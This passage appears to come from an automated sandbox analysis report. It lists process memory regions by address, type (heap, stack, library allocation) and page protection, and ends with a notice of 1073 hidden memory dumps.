page read and write
26B63000
trusted library allocation
page read and write
1EA79044000
heap
page read and write
1EA79211000
heap
page read and write
9BD7CFE000
stack
page read and write
1EA790BB000
heap
page read and write
1EA79228000
heap
page read and write
1EA7958C000
heap
page read and write
1EA791E0000
heap
page read and write
1EA79298000
heap
page read and write
1EA791D1000
heap
page read and write
243D0000
trusted library allocation
page read and write
7E70000
trusted library allocation
page read and write
385000
unkown
page readonly
26BF0000
trusted library allocation
page read and write
1EA792DC000
heap
page read and write
26BA0000
trusted library allocation
page read and write
26B70000
trusted library allocation
page read and write
88B0000
trusted library allocation
page read and write
26B82000
trusted library allocation
page read and write
1EA79274000
heap
page read and write
243A6870000
heap
page readonly
1EA79215000
heap
page read and write
8A45000
trusted library allocation
page read and write
26B7D000
trusted library allocation
page read and write
8A60000
heap
page readonly
243A9F60000
trusted library allocation
page read and write
1EA79091000
heap
page read and write
55B2B3B000
stack
page read and write
There are 1073 hidden memdumps, click here to show them.